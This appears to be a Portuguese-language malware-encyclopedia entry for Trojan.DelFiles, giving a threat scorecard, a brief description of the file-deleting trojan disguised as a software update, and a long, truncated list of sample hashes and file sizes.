Trojan.DelFiles

Por GoldSparrow em Troianos

Traduzir Para:

Cartão de pontuação de ameaças

Popularity Rank:	491
Nível da Ameaça:	10 % (Normal)
Computadores infectados:	102,826

Visto pela Primeira Vez:	January 19, 2011
Visto pela Última Vez:	February 6, 2026
SO (s) Afetados:	Windows

O Trojan.DelFiles é um Trojan nocivo, que se disfarça como a atualização de um software legítimo, para enganar os usuários e fazer com que eles baixem-no. O Trojan.DelFiles usa algoritmos para procurar e apagar vários arquivos ou pastas no PC infectado. O Trojan.DelFiles tem como alvo arquivos essenciais que vão deteriorar o desempenho do sistema e torná-lo vulnerável a outros ataques. Use uma ferramenta anti-malware atualizada, para proteger o seu PC contra o Trojan.DelFiles.

Índice

Relatório de análise

Informação geral

Family Name:	PUP.Bat2Exe.A
Signature status:	No Signature

Known Samples

MD5: dbc2ad8e2bea3e094489f6cb4c7256b9

SHA1: d225bd08b44624049ac7c912ac0978c814f68b41

Tamanho do Arquivo: 167.42 KB, 167424 bytes

MD5: 7064db31918ec9c3077a9c60dcaee9d1

SHA1: a76667a5775b60ae2c98af597649783d6b4b57ea

Tamanho do Arquivo: 282.62 KB, 282624 bytes

MD5: c3f6c7d16afe264d783a7f9a88c00501

SHA1: 34aeed84b28304d8dd5d7c1787320a1e25f8b900

Tamanho do Arquivo: 780.92 KB, 780923 bytes

MD5: ea15f2c31ece01abc641448e1bb506a4

SHA1: 6df5a47d76c061ae34982fad94f0bf0d8cdf6231

Tamanho do Arquivo: 121.86 KB, 121856 bytes

MD5: aca88d68d7a18f6b528e40966441a1dd

SHA1: 196abdfb4ff77993f88f162aff2caca8cf0ee27d

Tamanho do Arquivo: 91.14 KB, 91136 bytes

MD5: 98c2ac1d94c50edeafd1271cfa6d470f

SHA1: 61fcc5c92c1943773edc11473825897339dec7b4

Tamanho do Arquivo: 91.14 KB, 91136 bytes

MD5: fb2eb0c78504bea18105e888e815a918

SHA1: d758b4b1aa5b98ebb13418188d2e5dca9f673b9f

Tamanho do Arquivo: 91.14 KB, 91136 bytes

MD5: f83a83492db731c5abce971317d93f11

SHA1: be7a72118eef87ad53669567d3ff684017ab2c3b

Tamanho do Arquivo: 780.92 KB, 780923 bytes

MD5: 8f52b9d40a2f67219ec6284cca642ee7

SHA1: 652f6c89bf9170d41d6213b77a493c24ca74e2a8

Tamanho do Arquivo: 5.77 MB, 5770421 bytes

MD5: 64dc11b17d0890de61acca9ff0f684e3

SHA1: 2e64f09a8a3e093d79e20affff83e328043f29ca

Tamanho do Arquivo: 158.72 KB, 158720 bytes

MD5: 7bbbde5e7126090f416d435f9d76cca7

SHA1: a3f638b0b99ca22507bd4be393f7b7b8477f85f5

Tamanho do Arquivo: 368.64 KB, 368640 bytes

MD5: 33107d8af7b74bc311600f4021720058

SHA1: 2fa6bb3dc5eb9688f3ab7d445874933b20f0f7d6

Tamanho do Arquivo: 321.54 KB, 321536 bytes

MD5: 1b1a5704a4ac19e32e369e8f3e3f26ba

SHA1: 16bf8b3227a582f8ed38c961031af79582ed102b

Tamanho do Arquivo: 510.98 KB, 510976 bytes

MD5: 0094afac405f0e4f116c13b5d3a95ea7

SHA1: c2e0d1fbc5023b12e4b5ed07763dfc87c4af277b

Tamanho do Arquivo: 90.11 KB, 90112 bytes

MD5: bb7281c78b789d595492f0bd8630e968

SHA1: cf5a16d549295e22d21b4dd1060b0b4a3cb13472

Tamanho do Arquivo: 4.28 MB, 4279296 bytes

MD5: ef2fb9afb94888b324a2a345547f3523

SHA1: cf437befbe59db7af04b49ad48531326a2e01144

Tamanho do Arquivo: 668.26 KB, 668265 bytes

MD5: 54e68f4698971d7d9f0af8ff032a62f3

SHA1: a1dff17507721b4a8a0cd8cf8ef3d135a14c1f33

Tamanho do Arquivo: 2.92 MB, 2915840 bytes

MD5: e759a8beaf634485cbbf0c1e043b3537

SHA1: 611af08fa125bb06c6ffda91f07bb071740f1cb5

Tamanho do Arquivo: 136.70 KB, 136704 bytes

MD5: 711a3008e61865f52887d4f82351fa56

SHA1: 36e41c15e33fae9a43bf653bc73f8733120e5020

Tamanho do Arquivo: 5.89 MB, 5888512 bytes

MD5: eff3d11f57c064ad49152be621461419

SHA1: f098abb55a7f35ca96f96647ba5ffd66bad634c0

Tamanho do Arquivo: 470.66 KB, 470663 bytes

MD5: 44d2facfca05c6799e8b483d6f1a7bfa

SHA1: b7aef8840a2d2c86aa41fa78dd37a365f9c03216

Tamanho do Arquivo: 968.70 KB, 968704 bytes

MD5: 27305d521c3c612be29d6eed707e38c1

SHA1: 1ac14b67f79ca60c6d2a7f531dbeda86153edb92

SHA256: FE0C81C0E873CD5E3633E4C6AE2EBB27FFB0089CAD2B587693F36B21DB4A27FE

Tamanho do Arquivo: 126.46 KB, 126464 bytes

MD5: 62e794106d4c665b8f164f0b6a58e07e

SHA1: 7afe06c3f36649a6cf3c859b97c975ed20018f55

SHA256: C72655A71B249BB3F179ED976B62ADDA9F77C4C02E1A42CE2DE66F43C19BF418

Tamanho do Arquivo: 91.14 KB, 91136 bytes

MD5: 84733aecb9b3ad0a1c25ea3b7b2b0796

SHA1: 525e45acb542f56394bd478596a58df03e4e6aa6

SHA256: 9F6FD60EAFC9995186D3D86E873D53FD01DED10D1A83532E03D0FF12AD928A42

Tamanho do Arquivo: 956.42 KB, 956416 bytes

MD5: 50dc50276234b08b290b2435cd33d66d

SHA1: 69e22ec07d8ed9552db47640eca6bf3eacec4f99

SHA256: D172F7E6E5716094AD618470EB59EFF61243797B4714D3E300C23E4881DCFA64

Tamanho do Arquivo: 93.18 KB, 93184 bytes

MD5: 4e8531564c58b43dd208def76f32b5e9

SHA1: acf10261800b7fea776152012d7caadcbc416a11

SHA256: 1E73498E47017F4F8A5D792B6502A7822F08C21A0CEC5C21AC0264CF2476C59F

Tamanho do Arquivo: 97.79 KB, 97792 bytes

MD5: 3aa4cb59c91dfe350f45dc865b5b457c

SHA1: 646ad98b2ab8cf510b2ef4fd6204ce1500b77d45

SHA256: 5FAB40B26A0AB3007FF49D96E58BF56E3E65FE53E9467CCF5DCC94BCFF427F7E

Tamanho do Arquivo: 94.21 KB, 94208 bytes

MD5: a73c53dfd8a34d991176b786c91ccaf3

SHA1: 26b41b01347b7c83bacf99f7bedc9658e40e3a8b

SHA256: CE91284CEE3F03F997602FD025171B8724266D057529C3E3782EB44F7D69CF68

Tamanho do Arquivo: 229.56 KB, 229565 bytes

MD5: 4dfd36b34268b9cf5ed20ea50920b4c7

SHA1: 9e792801209c146191d8c0b5f9d10ee57218f5e0

SHA256: 465F87D9B1881D2C5719C880DE1DD6B420F6CE714516F7C33D4ACF4E135781D3

Tamanho do Arquivo: 88.06 KB, 88064 bytes

MD5: 83f00df7f4e3a241effce7622325422b

SHA1: 9158371994218b3f5440f0d85f97d4cf5948f9c9

SHA256: 55E257B9866DD271C6239195418D48EF23A35371D6CF7B0BDB60A792A1AB2FE9

Tamanho do Arquivo: 76.80 KB, 76800 bytes

MD5: 9c5ed65b81671001c474f3eaf87ef011

SHA1: 8c301368e70ac29e4b6d63245ca15961eb89261a

SHA256: 71F0202525587D7A3C53B8E9BA4EC5F4CAA20419B1F334E6BBFAFCC3CE9A54BA

Tamanho do Arquivo: 91.14 KB, 91136 bytes

MD5: 9307e91790fd277cf0ff79d332934113

SHA1: 916064be4febf2f907f7e0918e9df43ed25e548b

SHA256: 7106898899E83FF1E79242CAA244C06C2259048E2C87E841AA192D243929E7DC

Tamanho do Arquivo: 116.74 KB, 116736 bytes

MD5: ad238f5a9f0972b518721928cd2cf3c9

SHA1: 113cb3a4314efa2c3749f0abe28cc465b1e95fdf

SHA256: 76CF4C4162DBC5E9A941A4602114C10FECCC2B0E4DE7949A27837C0E96C2CF23

Tamanho do Arquivo: 9.03 MB, 9025536 bytes

MD5: cd48079e7c3e51457d71400f2293f541

SHA1: 6b67be539f6c0f5d9e6520bfd013529933137bce

SHA256: BA32274C883A2B368C82721AF1BD07EAF14564CC3CB760B13E99BE901ABE31ED

Tamanho do Arquivo: 272.90 KB, 272896 bytes

MD5: fa9b2c43fba4b72c16cf337417199d84

SHA1: 6267f9c66a05165115541009c32159f5936f6679

SHA256: 7948C9809C24C5AD1428B00349D3B4A167DED5EFDAEE5B891447FD92B8F02DB9

Tamanho do Arquivo: 336.03 KB, 336030 bytes

MD5: be58518615c8b78c9b9eaf06b3320b80

SHA1: 9523ce1bd3b1353ff89636a321effa4f59cf5fa1

SHA256: 45747B46D139655CC4EF9252AC5CFAF02CC3A38DBD0E6B2DD73FBC72BCE5F157

Tamanho do Arquivo: 156.16 KB, 156160 bytes

MD5: 41254c326811f4b7e581b5cbd6b8fb2a

SHA1: 30ff8cde54cc6567ef0b67100092d1c585ae24d6

SHA256: 72FD558E134066F790358133D03A0F136038CC27D025BB6F529A057E3EAA02FC

Tamanho do Arquivo: 92.67 KB, 92672 bytes

MD5: f038665424ec73b3d7328734337c2380

SHA1: 6d13efbb7898e835b981994ae9bebb8ae0268876

SHA256: BDBFDD86A59CE15603DEF9148DCAB6F07969D6007E26451456CAFA2942B0499C

Tamanho do Arquivo: 112.13 KB, 112128 bytes

MD5: 1ffd50fceaf28a727a34fd6940c4afa7

SHA1: 5f0378c1065dbdfb7adf85bbf255e42de8ba03ad

SHA256: 7732A01FEFC17C2C86EF2BA99FF92300758FE739E325C31404B8C0C517FFF91B

Tamanho do Arquivo: 780.96 KB, 780957 bytes

MD5: 515e7abaf968c50ea93e1604f2668041

SHA1: 1f9827912576f7d5492f8d8f0a547ed1fec26a0f

SHA256: C543147962AB28CE416DE5B3834FE8D1882A1F3C5086E36C1802B5E95B460243

Tamanho do Arquivo: 780.92 KB, 780924 bytes

MD5: 1458cbaf60a19877bdd5798e2c784127

SHA1: 4c38ca9c6a422f02c1ce1f7460b8d627c891b6cc

SHA256: 68AD1721A012D2E90A5BD1B7D2390666899F2E935CD90683ED9DB6F04E1ECE68

Tamanho do Arquivo: 92.16 KB, 92160 bytes

MD5: 2a623bfbc8b38e9bb5b67060affb6eed

SHA1: 4816fadcf00e01e862d4de2d0e54942038da2d4a

SHA256: D78AD7347E5B884465CD3542F6BC5DDAC0E1027C6A8FF386AE42A74EB59C10CB

Tamanho do Arquivo: 92.67 KB, 92672 bytes

MD5: b96a44d52252b5b0e52f9d004d6270d8

SHA1: 35343bd6d59cd3ac4369bb2f922f1c19eaea62d6

SHA256: CB5545FD648B390488A3ECC9100DD727E564730D1F23E7FC961AE783D20B0527

Tamanho do Arquivo: 360.96 KB, 360960 bytes

MD5: 212200373194d18eeac0f4cb391d78de

SHA1: 3243485130ab102488bf7c15742244f584b94940

SHA256: 22915C2247663A8FBC9D4A004F03A06E7C9261F6749A3828DF0FDA679013CC4D

Tamanho do Arquivo: 780.92 KB, 780923 bytes

MD5: 2abf9d659e6591f6162588e5e37dbf4e

SHA1: c2b799eafc9e626756c3110dab3e1c67970c9d14

SHA256: B3ECD7878538199AD8B269DBE16BA1661A6547B8750FF2959B59F96E1363B858

Tamanho do Arquivo: 6.73 MB, 6734848 bytes

MD5: 1aadbc37b820facc8a4cd3bde718c097

SHA1: bb8d2addb7c78aaed8748ea2e84ef1998c3644c4

SHA256: 9D79554F142D4FC2C609E6EF73DE2FD9C4E14849A7BE1F88B3C925FD7323B073

Tamanho do Arquivo: 142.34 KB, 142336 bytes

MD5: d0527c4ef269695561a659d2bf4c8cb5

SHA1: e975484ce976b767fa7e370ebae11e8e7e089d79

SHA256: A38AD21C0D8E6C6609EE80E1EDAD8FED68B07A153D0BEE930A40E812C2A7D446

Tamanho do Arquivo: 93.18 KB, 93184 bytes

MD5: fd2bfc151dc6a9df5c0c55b9d4481cb3

SHA1: f8177aa42d8b55c8eff12301431ae04e8b04d0be

SHA256: 5BF38C44C594A67DF0590D1AB9EC61E9B9294FB18FFF73DDB2FB25E4DA1E954E

Tamanho do Arquivo: 236.75 KB, 236752 bytes

MD5: 63071f7c0760c29d70c3d2c30163b377

SHA1: 95ef95c416ead7f3636f83d251f8b3ecf38fdf43

SHA256: DF6A6E15DB0496CA6500ADBAA23F7C1FA9747AD8815E4625FEB5C28CB734E23D

Tamanho do Arquivo: 363.01 KB, 363008 bytes

MD5: 233506877bc5177e7610ae2c6c846002

SHA1: 737abceaa9c987a1cd8f6c5a652d61908d1628a7

SHA256: E36A0F39144F6642757BD6339FC1F58668707A2FFA1BD55AB98FB2DEBEC9515F

Tamanho do Arquivo: 91.65 KB, 91648 bytes

MD5: 1aba70071de8134efeb686d9c53bcc58

SHA1: 4f1ebdc88c182664315e080dbfb7ef88b88b0e72

SHA256: 20573CF2732F03DC18A647911015DBC33A3B77BF39FF92E0C86CE33E49D35A7C

Tamanho do Arquivo: 99.84 KB, 99840 bytes

MD5: 32a6076a88f93d16f7e71036520e467c

SHA1: 96e87d891cb8f7e0006dfab04d60132cc35ef374

SHA256: DB4A5F2730056EB191A4C9971C5CA2CC20B216533EAAF1BDD6DC6FE015B94007

Tamanho do Arquivo: 235.25 KB, 235255 bytes

MD5: d9273ee44b97bcc01a0299a7c4403832

SHA1: ccac3b7aac9a40078723632d48710d748a98a2ed

SHA256: DC26CE7C6C2E109A4F28CFCD576AA0517B9417BD4091DA61CD0E32D969446C4E

Tamanho do Arquivo: 91.65 KB, 91648 bytes

MD5: 4e5eb174273acc983641e90973cc8e87

SHA1: e68bbf42b0820e44e31d334b27f6092bfa6ff8a5

SHA256: 692995526092914D2BE177E8A70F656760C3890E06FA2AC64FCDAFEC4CBCFBD4

Tamanho do Arquivo: 781.00 KB, 780997 bytes

MD5: f7b55502a71cef2d1e70d88aeeb63d73

SHA1: bfd5a73a583a78464cb9f46d3799f6c9f47663ff

SHA256: 9EB6551959A913DE98898302EC764841BE357C0786038BDFA1C3D7F269D490A6

Tamanho do Arquivo: 1.06 MB, 1062912 bytes

MD5: 9cd23df0a386687365683bc6c34f53de

SHA1: a51a3e1cf8bbd569d246a2a8a47141cf5c8da217

SHA256: AB85A13E87C61D4FB36E4A67798DB17C6C7456F9FC72F22B3EE2653B4377ED04

Tamanho do Arquivo: 122.37 KB, 122368 bytes

MD5: c7f3d6004382c49b3419ae1c57084d8e

SHA1: d0bfbc95a066dfa10ebd5204abea7ed0e71e9a0d

SHA256: 3B0CE504CA358E791ECE743BC36C5C7FF592A3FC1DB68A105E1CAF74396738B9

Tamanho do Arquivo: 96.77 KB, 96768 bytes

MD5: 354555db5410519895c713e9344857ae

SHA1: 38e1bc03f2af7b84740626a783bc0da32ab8e085

SHA256: 18803AA975FAE8174C563A6635BC8C991CACDD1C3D914CE078B2BBCC3D5CEA54

Tamanho do Arquivo: 2.05 MB, 2046464 bytes

MD5: 44a48ae71dcb7222cb46e15ea6f1ea7e

SHA1: 034a828d1793b2544b48f0229977fa12d3fbbb98

SHA256: E1198B766BEF7BDA8188E3F03FD74630E0CEB519352040C76C55A5560A3DF75D

Tamanho do Arquivo: 91.65 KB, 91648 bytes

MD5: 575c16142ce1b54aeb465aa9d7e36be2

SHA1: 6f31c89c6254614c79ef264d54dd72b2e77ddad9

SHA256: 7938A52F2CCAF73F14C35E28508B37705E28ED3ACB5F37F39F59D7200BA6A915

Tamanho do Arquivo: 91.14 KB, 91136 bytes

MD5: f0d5c2ba9f8d022c1f3dceaddf89cb8d

SHA1: 4ca7ec198843a934160505cc44b9ab4bd97160ea

SHA256: 42DADFB0ADDDB6D97BF9AEE33FDA0FA90A77F0513AC1A92008C5C948675D981F

Tamanho do Arquivo: 97.79 KB, 97792 bytes

MD5: b3436405182eebbd0c97e7c18d9f55a8

SHA1: 8db4e19e8a63f878c3a0cdc240f785881da46d6e

SHA256: 2BE130B0151EC30B506DA62D2A786797726E00058C9B17285945B4E9253D1845

Tamanho do Arquivo: 153.09 KB, 153088 bytes

MD5: b49ccc90414a464b1a29c295379c79d3

SHA1: 09e8756bb75ee0813db9c63604dc4eef8df4f881

SHA256: 9EFC504F42A508727A607A17E8E65EE67424C5ECD777523467BF30007807AA5D

Tamanho do Arquivo: 154.62 KB, 154624 bytes

MD5: cc6bcaec2e1fb42329e2de273a10b183

SHA1: 8c7f6eceac190cf8e4dcf67e95fe20d3776d54eb

SHA256: B02C044ED01E258837B0D2CE23FC3C3B61A81EE1E0C973725132D0D158E2C50E

Tamanho do Arquivo: 9.01 MB, 9011200 bytes

MD5: 0579b8c677af29a747e7e2ae00eba0f5

SHA1: 7ceefaf975688fafb2b41e84cfe3ec3bf4d3716a

SHA256: 78598BD59A57336234CF2767B858CDDC74ECDAC16B3C05D93463376368C30A96

Tamanho do Arquivo: 463.87 KB, 463872 bytes

MD5: 2351c1f3d9cee39709bb95c5cb605c4d

SHA1: 101ff3d8b7ab0992813a52d8481678e22c5483f6

SHA256: 780BE98E4755BD0D5AADC6EC02CF316912F78C79863E480AEA16694C697D3EC5

Tamanho do Arquivo: 107.01 KB, 107008 bytes

MD5: b0c4230049ad5ad1829a5ef8681adf7d

SHA1: eb2d047a53585bb51a090f16b28e1298139f8bd7

SHA256: 10271A603F838B279076769D7D5335A5AB0A58B2B23E0D2F72C3C57DF22A20C6

Tamanho do Arquivo: 95.74 KB, 95744 bytes

MD5: 74c60b65a9c0e02e468d92bf5a214592

SHA1: fcd8d46aeea4b94b00cf016d89be50a7649f3060

SHA256: 2CBFD3422B64C1FE5B3BE645DB0ECBBAF72D668881275B325E0DAAA95A0533A1

Tamanho do Arquivo: 93.18 KB, 93184 bytes

MD5: 4e462fc63406be55cba289c980e660cc

SHA1: 5bf59c257f6fd967c500ab5c32d75cb534cb96f2

SHA256: 08E165A11BA108E6D4A47AC5B03FD771324FBD12EEE3D87A5E5EF54DB4B71F0E

Tamanho do Arquivo: 780.95 KB, 780945 bytes

MD5: 0f70afa9732403dad13457d8c0f0d820

SHA1: 1b3e7b4f41d103a45749b5c9c8c116b5beb66db8

SHA256: 3DC496240D07ADEEC77E5A8E22938CE25CBA8DBE5E5767F19D3B8EFB9C0FAB44

Tamanho do Arquivo: 220.67 KB, 220672 bytes

MD5: def23c86ab68222671fae59845745b48

SHA1: 5848459c23856fa50442bf774409cfa7b8aede72

SHA256: 8B587AEFD1710FDDED11C041BB2EB54F22C1077EDAA8D2D8A9A45F0FFB1983B5

Tamanho do Arquivo: 4.24 MB, 4242944 bytes

MD5: dbc5a392f605b86207adc569ebc8dd0e

SHA1: e122b0d913bcd7fda5ee9634e1815969d93516e4

SHA256: A47A947494EB450D83F60549DA58943C181A04B87FA0C1DB7F258CC215AFBE8E

Tamanho do Arquivo: 90.62 KB, 90624 bytes

MD5: a56b5306606a5509d276c4ffb25b7af3

SHA1: 499785c981152fc5e4a5c19cc3a691c081f1443d

SHA256: 876319D0371217CFD128DF97FEEDDDEA01583655F02656DB505FC4E62C205B02

Tamanho do Arquivo: 296.45 KB, 296448 bytes

MD5: 13bc83a97ec58f77ff29d3ebfe56a3be

SHA1: 139857b105d5ec2545e3bafedc71757e24d25fb3

SHA256: E0DFB7602A057D0A992BC5E77544833AB142ADDFC3B0D029DEFE666D4907A888

Tamanho do Arquivo: 91.14 KB, 91136 bytes

MD5: 68b9786ed57c72bfdff965206c5a4949

SHA1: eddd09fccbfb773e5c2f80c6bfe900216bd6aeb9

SHA256: 36450C5103B758702CB7956268E243391C71A632E2A1BF75D7A39346AEB8A533

Tamanho do Arquivo: 116.74 KB, 116736 bytes

MD5: 426a27519a8170d153790b4036efb1fe

SHA1: 4ad81beaf55f61f1ac6b0c4bf8b7e4321cae3ea1

SHA256: 12BFACB21000E5E40CE7813814D723F1C51FDDCEFD8D5350E4B218D202C06C75

Tamanho do Arquivo: 91.14 KB, 91136 bytes

MD5: 258191417ab3de44eeed73f1e897049e

SHA1: d1875f531317d5956a6acd61330e11c4df8ddd46

SHA256: 861F43BAB9E9615F40535648AE8A0FC4D1296566440B85E6A34728F702E6DD1F

Tamanho do Arquivo: 91.14 KB, 91136 bytes

MD5: f2d32a2d3c993c6084db085a849c9de2

SHA1: 4dbfe059934c3dc68445f48824a7b7e0877b1809

SHA256: FAAFD73A85F7260AE9044CDE6C37BB62A243B9899A3D96E9C5E12C42699C22B7

Tamanho do Arquivo: 190.46 KB, 190464 bytes

MD5: 989b71e4dad1bf0d07d25b3572e63718

SHA1: d5c99869b44b84e7443fec20544051f68f3334b4

SHA256: E19A12BAE13E1490C48DCD253AAEB2ABDD0723089C5243BD53DD69E1B0F8119B

Tamanho do Arquivo: 236.03 KB, 236032 bytes

MD5: 9923e96b6cf20f11ad503a5127219e80

SHA1: 2ba5daed3d3faf91d68157582529745797496ea7

SHA256: A7E4EFF5F2E9A8CA5581A550163A9165CFE14658F25690D798CF9EEEDEED5147

Tamanho do Arquivo: 1.68 MB, 1676987 bytes

MD5: 5b98f6f68f579edc85e6223ca8a3042f

SHA1: 6a9e97a1316a5242915a0819f9d4f2cb61914e4f

SHA256: 51CC7987D7E3D07DC2447939C9008366F6F89E63F3545B1CB02AA50AACD5ACA1

Tamanho do Arquivo: 2.91 MB, 2912768 bytes

MD5: 9622649e93dea1447287f2752b797674

SHA1: b8fa40dc8af07621a4a5de690dd7409e69cb8488

SHA256: E57F56D468F357249F9BD5D0C234F892C8231AC5B11F079563BB963894409D6A

Tamanho do Arquivo: 97.28 KB, 97280 bytes

MD5: 2d9bc6e284688eb01ceb547e82579d80

SHA1: 85bbf6bb464972a992416e208a37a0f587458b19

SHA256: D7D33E0D2CFDD3294FD621D01885AD5D629B4CB9FEB776B6C24BF4D68462F224

Tamanho do Arquivo: 316.93 KB, 316928 bytes

MD5: 3d15ade4e5bef55b11b0169a5bfb6953

SHA1: b03dd16b8d3f6ba28e24b6aad09a2f759d5a74e4

SHA256: E0172580CE040F0DC5C5EAA33BC8B0B8549D2DF27A6811AAFACAE73591CB16F3

Tamanho do Arquivo: 91.65 KB, 91648 bytes

MD5: 668f8e1dddd4bf62f59fb0c9b7d40604

SHA1: 0932c3a3aac2cffdfc785eae523983025b062e8e

SHA256: E651975805A8A5998FD8EA446831D044FE5960FA8BB42B649894A9F9612ED80A

Tamanho do Arquivo: 130.56 KB, 130560 bytes

MD5: ca7406890e799963ed3930d17828aba7

SHA1: c4c2c2e3fe358347d049eff740febcc510309a29

SHA256: 6A5E480D5850190E0A68E80FF27DCC8D55EE5BA9DC96663A54F841866E501F48

Tamanho do Arquivo: 148.48 KB, 148480 bytes

MD5: 476c79495df7be45db34ff978c06410d

SHA1: 7038d5ad3bdf865c821e76d9705379e1bc1212e7

SHA256: A3F2023472EE03C9A9FDFEB9EB236351D5DF2D9798E4FAB77D3692EA57E6CF6A

Tamanho do Arquivo: 103.42 KB, 103424 bytes

MD5: fbfaebf1d748f373e4396adfd52f93ca

SHA1: acad8b42eb3b7fcddaf7702009b96bc0e090055a

SHA256: 32980B6E36CA5C448DF2DEAD18029C9BB381F80364F6EE5804B690A1F1473B8B

Tamanho do Arquivo: 91.65 KB, 91648 bytes

MD5: a6f0370ef1e27e0e327b606426d6f674

SHA1: cea7091372aab93c32d1d477b04a22d40efd3c73

SHA256: 6FDB680C9B61AC40D1775EAE070ADB53E2DF7519518D45908F3CADA4C9974D60

Tamanho do Arquivo: 126.46 KB, 126464 bytes

MD5: 91958e613a2180a3253a019aff84ffc8

SHA1: 1ef72cb9a5bb8c26f42695519b78b804039d01f7

SHA256: 790E61F174F58F442C41F19F01228006640CEF3551F1411FB60981C2B26C6300

Tamanho do Arquivo: 243.71 KB, 243712 bytes

MD5: b76ee46490f81cd6d0eda9bb6d852786

SHA1: 35b06ce6cd3e452d762befd609029aa658ab6200

SHA256: F73DF88966B130B352F263D7361BCCDC2A2E35CA36029C9B80B1526257C712E2

Tamanho do Arquivo: 254.98 KB, 254976 bytes

MD5: faead3058857d2c6b820a7e6c40213e4

SHA1: 10af2d7837a09c856b03ad765730c731e8f1666c

SHA256: 40A95453FA61A6A37D3AECC953638D248F62BF9A9FBAB385DABA82A2D272E9D4

Tamanho do Arquivo: 780.96 KB, 780958 bytes

MD5: 1c505b6f2f5048569c02e87ad421e947

SHA1: fe3a67dfaa0bab28943a0f9298a00912927fbd00

SHA256: 449340189BA239E6F274C38AF13E581FB8889DFCC9C472A0FF1E0807694D4F72

Tamanho do Arquivo: 353.28 KB, 353280 bytes

MD5: 9c0efef6a4ada092c40c4b7e57214564

SHA1: 8182a72c1867098313c8ffb1a75a91f4c02a6a75

SHA256: 9A47E7FC7F6F1D7E493C124DD947D1715AE006068533AB0922524A3E0687FEF8

Tamanho do Arquivo: 94.72 KB, 94720 bytes

MD5: f3746414044a78f7e7423b5ce59e5518

SHA1: 1af7ff46390efecf87c80542cc55b657e798ff2c

SHA256: C231F7030FA4E0B70062996CCBF6921CABA531A99B73472D139204FC306F2BF5

Tamanho do Arquivo: 465.92 KB, 465920 bytes

MD5: 7e708e0e3087ade9f8a43f7549f89b4d

SHA1: fc9f289049ad936133d270088b0ecb871be37fb0

SHA256: E5C607738B59344A4BFA54113A1CBAFF9F304D68EFFD4632C7E53305ECCF3F07

Tamanho do Arquivo: 4.86 MB, 4856832 bytes

MD5: 95966e805df9b6b2d47b94091bc5b1c0

SHA1: 195803d634a77ee79cb2f0e9e2745857d0d69ac6

SHA256: 14B71144E8E85BADB003B35460423B00FF8CB6F880948AC3A12031855A82D5CB

Tamanho do Arquivo: 2.30 MB, 2302632 bytes

MD5: b5cf7881d6932938872bbdbc16178d6d

SHA1: 49396ef8499710bcf773fa5451442d84b2be6e27

SHA256: 85255BF8AD4F654F30452B1B7FA1103F7799DD3DED7F38664C75209AFD96FAE4

Tamanho do Arquivo: 69.12 KB, 69120 bytes

MD5: d59b6b413b16e63b9b9e0304f382963e

SHA1: a16eaa4d985cc71a519948587cf41e0765456bff

SHA256: B7F48D7F145ADAC7B63FEB1D563C8CBFA392A97CD705DCE5B3D2665EEE3458C9

Tamanho do Arquivo: 346.11 KB, 346112 bytes

MD5: 9de08b707e854ec68fd124528c2a1712

SHA1: 3134e67488c6b20f4d102370d41f60ab8a3709c3

SHA256: CB5ABB8BC78D966BD4025C072119A62DCED660CC7717820A693D9235C643617A

Tamanho do Arquivo: 91.14 KB, 91136 bytes

MD5: a69283fefe856b7fc2dc2c3a650b2486

SHA1: de793f9c899e63b0aef389bf0aa7222533250ac2

SHA256: 1FD850A90A463E4DA25BFB2E81CF7AC1FDE7A6DA0F753A99125D6C61AC7F0799

Tamanho do Arquivo: 92.16 KB, 92160 bytes

MD5: 9b6fffb0a44e39e6294d3526ad35ace5

SHA1: 7c7f3b1feb783dbab361113a9563c8de8df29e2e

SHA256: 0AE61D4672CA991FCFAEFBBABEC890D837C98DF7962A9C9986A4A98C686992CA

Tamanho do Arquivo: 640.00 KB, 640000 bytes

MD5: 3d3d134044e1d122a2e35c4a508ea2d3

SHA1: 82fb6cfb89d71447f7d9f415696af84d8900b27c

SHA256: D4BB576CF87455D973F16FB8BB454AC9FE2E16F6C54947F8E5C534B495057BA7

Tamanho do Arquivo: 253.44 KB, 253440 bytes

MD5: 1acbdec5e70d0305371d547bf9ee5671

SHA1: ee12a4a323cf403f2d2add2d149b7671dc4c094a

SHA256: 46FE46D58D2FD59540B5CDB3A7DB59540B0356C734A3DBE6694684A09D0F5999

Tamanho do Arquivo: 173.57 KB, 173568 bytes

MD5: bed6849c2a55b900241abb474f8e6107

SHA1: 27fd58f1854d81fed514ed24e7bb878e120f8c08

SHA256: B40D502048A2BF8CEF12935FEA634D97D5D2B8DAB4ADCEB7D08B41187D7BF159

Tamanho do Arquivo: 336.90 KB, 336896 bytes

MD5: b953f377f497d340af09c8ecc67274f7

SHA1: bb837e0edf1e75d74ca83196201c7a634a00b217

SHA256: 5B58EEE13D34A4BC311A5C908596388511CE87D6799B6282E4BC377294C5850A

Tamanho do Arquivo: 103.42 KB, 103424 bytes

MD5: 4fe88322cf74c2201cf2f6b5a1019ca7

SHA1: 8560b84c0eb5b7a9219dd1690e852a0661426566

SHA256: 755AEC2DF05637776200D9BD754200C3D5567487D0A0A9940E742DC9099BB12E

Tamanho do Arquivo: 140.80 KB, 140800 bytes

MD5: 005d10aa18b317de53c01ce385f8c577

SHA1: 3de74bf6140e0842b8bbe9723d1c975409128130

SHA256: 45D595C3FAF63EF0338E5DD1C39DC1846EA14FED31C549BEE4CC96D377844693

Tamanho do Arquivo: 146.43 KB, 146432 bytes

MD5: b5d4f41ae508d6a8196d97e014726fa7

SHA1: e6b8d1dd5a893206ce42c961517915b223c440a8

SHA256: 8406E8B1345C776F05764455F149B197C01569DBE8081D173D7C025EEBD3C059

Tamanho do Arquivo: 97.28 KB, 97280 bytes

MD5: 909269c5305ee60207b6d5c69763adab

SHA1: 278db7c3c4f389b5a60fae1a9081ba8af7d55249

SHA256: 29AF8076805895F2A38E79FD8FE96416D5AD562E2C619555FD934F18B6AD587F

Tamanho do Arquivo: 91.14 KB, 91136 bytes

MD5: 5c07825f4c79ec0157522debfb77e7c9

SHA1: 668849d860fe2b9f1756f238d824611446043d00

SHA256: F7B9DA5AD20F106AC4758B6598A12E889799409CE89EBAE6210495DC82BFA58F

Tamanho do Arquivo: 919.04 KB, 919040 bytes

MD5: 493d68ace8803d6588dcf93a4b1915af

SHA1: 5cef4720d54ad1bf3d871d740830c056b58f4bf3

SHA256: 2A5A11616CF7554C57934B491FD74365E80B737EFFE2A01710AA60C05B7D60F6

Tamanho do Arquivo: 780.96 KB, 780958 bytes

MD5: a098bdb48bd951b4bd64383304e9579c

SHA1: 8249b83cf371c9176de79864b4117f3261d5103a

SHA256: DFED334941EFE0D1617CADF21EC7081FC6024EDCFDA828587238CC1634DC71C9

Tamanho do Arquivo: 653.31 KB, 653312 bytes

MD5: 3a713d3401683f574e4b28babfd1d2ac

SHA1: bf82b22752d056b9d14eff326885e290145a1732

